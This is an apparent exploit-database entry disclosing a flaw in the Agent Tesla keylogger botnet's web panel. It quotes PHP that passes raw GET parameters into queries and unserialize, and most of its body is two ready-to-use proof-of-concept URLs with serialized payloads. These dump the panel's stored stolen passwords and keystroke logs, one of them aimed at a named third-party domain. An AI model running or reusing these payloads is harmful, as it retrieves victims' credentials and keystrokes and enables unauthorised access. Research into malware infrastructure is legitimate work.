Agent Tesla Botnet - Information Disclosure
2019-04-30 18:05:12################################
# Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability
# Google Dork: n/a
# Date: 26/11/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: http://www.agenttesla.com/ ¡ Down !
# Version: unkn0wn
# Tested on: Windows 10, debian 7
# CVE : n/a
# Greetz: Shell.root, Griever, Telibles
################################
# Vuln-Code: http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php
$table = $_GET['table'];
// Table's primary key
$primaryKey = $_GET['primary'];
if(isset($_GET['where'])){
$where = base64_decode($_GET['where']);
}else{
$where = "";
}
$idArray = unserialize(urldecode($_GET['clmns']));
################################
PoC Extract full passwords:
http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php?table=passwords&primary=password_id&clmns=a:6:{i:0;a:2:{s:2:"db";s:11:"server_time";s:2:"dt";s:11:"server_time";}i:1;a:2:{s:2:"db";s:7:"pc_name";s:2:"dt";s:7:"pc_name";}i:2;a:2:{s:2:"db";s:6:"client";s:2:"dt";s:6:"client";}i:3;a:2:{s:2:"db";s:4:"host";s:2:"dt";s:4:"host";}i:4;a:2:{s:2:"db";s:8:"username";s:2:"dt";s:8:"username";}i:5;a:2:{s:2:"db";s:3:"pwd";s:2:"dt";s:3:"pwd";}}
PoC Extract full Keystrokes:
http://etvidanueva.com/photos/images/WebPanel/server_side/scripts/server_processing.php?table=logs&primary=log_id&clmns=a:6:{i:0;a:2:{s:2:"db";s:6:"log_id";s:2:"dt";s:6:"log_id";}i:1;a:2:{s:2:"db";s:11:"server_time";s:2:"dt";s:11:"server_time";}i:2;a:2:{s:2:"db";s:4:"hwid";s:2:"dt";s:4:"hwid";}i:3;a:2:{s:2:"db";s:7:"pc_name";s:2:"dt";s:7:"pc_name";}i:4;a:2:{s:2:"db";s:3:"log";s:2:"dt";s:3:"log";}i:5;a:2:{s:2:"db";s:9:"ip_addres";s:2:"dt";s:9:"ip_addres";}}
Fixes
No fixesIn order to submit a new fix you need to be registered.